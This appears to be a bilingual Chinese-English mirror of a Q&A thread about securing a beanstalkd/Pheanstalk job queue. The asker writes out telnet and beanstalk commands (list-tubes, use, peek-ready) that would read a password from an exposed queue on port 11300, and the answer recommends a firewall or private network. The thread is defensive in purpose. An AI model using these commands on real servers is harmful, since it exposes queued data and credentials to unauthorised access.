Beanstalkd/Pheanstalk 安全问题 [英] Beanstalkd / Pheanstalk security issue
问题描述
我刚刚开始使用 beanstalkd 和 pheanstalk,我很好奇以下情况是否属于安全问题(如果不是,为什么不呢?):
I have just started using beanstalkd and pheanstalk and I am curious whether the following situation is a security issue (and if not, why not?):
在设计一个队列,该队列将包含最终工作脚本的作业以获取和执行 SQL 数据库查询时,我问一个朋友我可以做些什么来防止在线用户进入我的服务器的端口 11300,并插入一个作业自己进入队列,从而导致作业被恶意代码执行.有人告诉我,我可以在发送的作业中包含密码.
When designing a queue that will contain jobs for an eventual worker script to pick up and preform SQL database queries, I asked a friend what I could do to prevent an online user from going into port 11300 of my server, and inserting a job into the queue himself and hence causing the job to be executed with malicious code. I was told that I could include a password inside the job being sent.
虽然过了一段时间,我意识到有人可以在终端上执行一些简单的命令并获取队列中的作业,从而找到密码,然后创建包含密码的作业:
Though after some time passed, I recognized that someone could preform a few simple commands on a terminal and obtain the job inside the queue, and hence find the password, and then create jobs with the password included:
telnet thewebsitesipaddress 11300 //creating a telnet connection
list-tubes //finding which tubes are currently being used
use a_tube_found //using one of the tubes found
peek-ready //see whats inside one of the jobs and find the password
如何确保不会发生这种情况并且我的队列不会被黑客入侵/控制?
What could be done to make sure this does not happen and my queue doesn't get hacked / controlled?
提前致谢!
推荐答案
您可以通过将 beanstalkd 放在防火墙后面或专用网络中来避免这些情况.
You can avoid those situations by placing beanstalkd behind a firewall or in a private network.
DigitalOcean(例如)提供这样一种服务,您可以在其中拥有一个只能从同一位置的服务器访问的专用网络 IP 地址.
DigitalOcean (for example) offers such a service where you have a private network IP address which can be accessed only from servers of the same location.
我们在公司使用 beanstalkd 一年多了,我们还没有遇到任何这些问题.
We've been using beanstalkd in our company for more than a year, and we haven't had any of those issues yet.
我明白了,但如果生产者是一个名为 index.php 的页面,当有人进入它时,一个作业将被发送到队列中.在这种情况下,服务器不是必须是开放网络吗?
I see, but what if the producer was a page called index.php, where when someone entered it, a job would be sent to the queue. In this situation, wouldn't the server have to be an open network?
浏览器无法与作业服务器取得联系,它只能访问/you/允许他们访问的资源,即查看页面.只允许后端访问作业服务器.此外,如果您以某种方式构建前端与后端分离的 Web 应用程序,您将面临更少的潜在安全问题.
The browser has no way to get in contact with the job server, it only access the resources /you/ allow them to, that is the view page. Only the back-end is allowed to access the job server. Also, if you build the web application in a certain way that the front-end is separated from the back-end, you're going to have even less potential security issues.
这篇关于Beanstalkd/Pheanstalk 安全问题的文章就介绍到这了,希望我们推荐的答案对大家有所帮助,也希望大家多多支持IT屋!
